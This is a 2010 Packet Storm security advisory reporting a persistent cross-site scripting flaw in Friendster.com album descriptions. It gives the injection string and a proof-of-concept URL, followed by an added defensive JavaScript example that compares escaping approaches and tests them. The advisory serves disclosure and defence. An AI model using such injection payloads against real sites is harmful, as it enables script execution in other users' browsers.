Friendster.com Cross Site Scripting

2010-05-04T00:00:00
ID PACKETSTORM:89144
Type packetstorm
Reporter AutoSec Tools
Modified 2010-05-04T00:00:00

Description

                                        
                                            `#==================================================================================================#  
# #  
# Vulnerability............Persistent XSS #  
# Software.................Friendster.com #  
# Date.....................5/2/10 #  
# #  
#==================================================================================================#  
# #  
# Site.....................http://cross-site-scripting.blogspot.com/ #  
# Email....................john.leitch5@gmail.com #  
# #  
#==================================================================================================#  
# #  
# ##Description## #  
# #  
# The album description and a few other fields are not properly escaped before being rendered #
# into JavaScript. #
# #  
# #  
# ##Exploit## #  
# #  
# \";alert(0);// #  
# #  
# #  
# ##Proof of Concept## #  
# #  
# http://www.friendster.com/viewalbums.php?uid=120927091 #  
# #  
#==================================================================================================#  
`
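
Added example (not part of the advisory and not Friendster's code): the Description above says fields were rendered into JavaScript without proper escaping. The sketch below contrasts an assumed quote-only encoder with a full JavaScript-string encoder and checks whether a value stays inside its string literal; all function and variable names are hypothetical.

```javascript
// Added example: names below are hypothetical, not Friendster's code.
// Assumed weak encoder: escapes double quotes but not the backslash itself.
function escapeQuotesOnly(value) {
  return value.replace(/"/g, '\\"');
}

// Encoder for a JS string literal inside an HTML <script> block:
// JSON.stringify handles quotes, backslashes and control characters; the
// extra pass keeps "</script>", "<!--" and U+2028/U+2029 out of the markup.
function escapeForJsString(value) {
  return JSON.stringify(String(value))
    .slice(1, -1)
    .replace(/[<>&\u2028\u2029]/g,
      (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Render the statement the page template would emit.
function render(encoder, value) {
  return 'var albumDescription = "' + encoder(value) + '";';
}

// Defensive check for template tests: walk the emitted statement the way a JS
// lexer would and report whether the value stayed inside the string literal.
function staysInsideLiteral(statement) {
  const start = statement.indexOf('"');
  for (let i = start + 1; i < statement.length; i++) {
    if (statement[i] === '\\') { i++; continue; }   // skip the escaped character
    if (statement[i] === '"') {
      return statement.slice(i + 1) === ';';        // nothing may follow but ";"
    }
  }
  return false; // literal never closed
}

// Constructed inputs: the string from the advisory plus an ordinary description.
const samples = ['\\";alert(0);//', 'Summer "2009" trip'];
for (const s of samples) {
  console.log(JSON.stringify(s),
    'quotes-only:', staysInsideLiteral(render(escapeQuotesOnly, s)),
    'full:', staysInsideLiteral(render(escapeForJsString, s)));
}
```

The quote-only encoder passes the ordinary description but fails on the advisory's string, which is why template tests should include inputs containing backslashes as well as quotes.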